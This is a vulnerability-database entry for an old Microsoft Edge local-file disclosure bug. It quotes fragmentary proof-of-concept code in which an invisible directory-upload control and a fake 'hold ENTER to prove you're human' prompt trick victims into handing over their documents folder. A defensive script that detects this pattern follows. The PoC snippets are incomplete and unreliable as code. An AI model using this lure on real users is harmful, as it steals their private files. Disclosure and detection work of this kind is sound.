Microsoft Edge local files disclosure (CVE-2016-7239)

ID SSV:92956
Type seebug
Reporter Root
Modified 2017-04-15T00:00:00


No description provided by source.

the difference was that the default directory was 'My Documents' so I showed that the folderpicker can be used to receive all the files within a victim's documents folder.
This has since been fixed.
Read all files on PC - PoC - By @qab
        #thing {
            opacity: 0.0;

    <h3 id="qmsg">Hold down the ENTER key for 5 seconds to prove you're human..</h3>
    <input id="thing" type="file" webkitdirectory mozdirectory accept="text/*" />

        var r = new FileReader();
        thing.onchange = function() {
            alert('I can read ' + this.files.length + ' files from anywhere on your pc!');//This is for PoC only. We can access all data using this.files as seen next.
        //This is where we detect if the user is holding the Enter button.
        var i = 0;
        document.onkeydown = function() {
            if (i > 4) {
                i = -10000;
                document.onkeydown = null;
                setTimeout(function() {
                    qmsg.innerHTML = '<u>Thank you! Please wait while we verify (this might take a few minutes).</u>';
                }, 1000);
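
A defender-side check for the pattern the PoC above relies on (a directory-picking file input made invisible with opacity 0, on a page that also hooks key events), as an added example that is not part of the original PoC. It goes slightly beyond the PoC by also covering inline style attributes and class selectors; the function names and both sample strings are constructed for illustration.

```javascript
// Added example: static heuristic for the hidden directory-picker pattern.
// Regex-based: handles simple #id/.class rules in <style> and inline style only.
const ZERO_OPACITY = /opacity\s*:\s*(0+(\.0*)?|\.0+)\s*(;|}|!|$)/i;
const KEY_HANDLER = /\bonkey(down|up|press)\b|addEventListener\(\s*["']key(down|up|press)["']/i;

function attr(tag, name) {
  const m = tag.match(new RegExp('\\s' + name + '\\s*=\\s*["\']([^"\']*)["\']', 'i'));
  return m ? m[1] : '';
}

// <input type="file"> tags that ask for a whole directory.
function directoryInputs(html) {
  return (html.match(/<input\b[^>]*>/gi) || []).filter(t =>
    /\stype\s*=\s*["']?file\b/i.test(t) &&
    /\s(webkitdirectory|mozdirectory|directory)(?=[\s=\/>])/i.test(t));
}

// Selectors of CSS rules that set opacity to zero.
function zeroOpacitySelectors(html) {
  const out = [];
  for (const s of html.matchAll(/<style\b[^>]*>([\s\S]*?)<\/style>/gi))
    for (const r of s[1].matchAll(/([^{}]+)\{([^}]*)\}/g))
      if (ZERO_OPACITY.test(r[2])) out.push(...r[1].split(',').map(x => x.trim()));
  return out;
}

function isInvisible(tag, selectors) {
  if (ZERO_OPACITY.test(attr(tag, 'style'))) return true;
  const id = attr(tag, 'id');
  const classes = attr(tag, 'class').split(/\s+/).filter(Boolean);
  return selectors.some(s => (id && s === '#' + id) || classes.some(c => s === '.' + c));
}

function scanPage(html) {
  const inputs = directoryInputs(html);
  const selectors = zeroOpacitySelectors(html);
  const hidden = inputs.filter(t => isInvisible(t, selectors)).length;
  const keyHandler = KEY_HANDLER.test(html);
  return { directoryInputs: inputs.length, hidden, keyHandler,
           suspicious: hidden > 0 && keyHandler };
}

// Constructed samples: the first reuses only fragments shown on this page.
const POC_MARKUP = `<style>#thing { opacity: 0.0; }</style>
<input id="thing" type="file" webkitdirectory mozdirectory accept="text/*" />
<script>document.onkeydown = function() {};</script>`;
const VISIBLE_UPLOAD = `<input id="up" type="file" webkitdirectory />
<script>document.onkeydown = function() {};</script>`;
console.log(scanPage(POC_MARKUP), scanPage(VISIBLE_UPLOAD));
```

A visible directory upload control is not flagged; only the combination of an invisible directory input and a key-event hook is reported as suspicious.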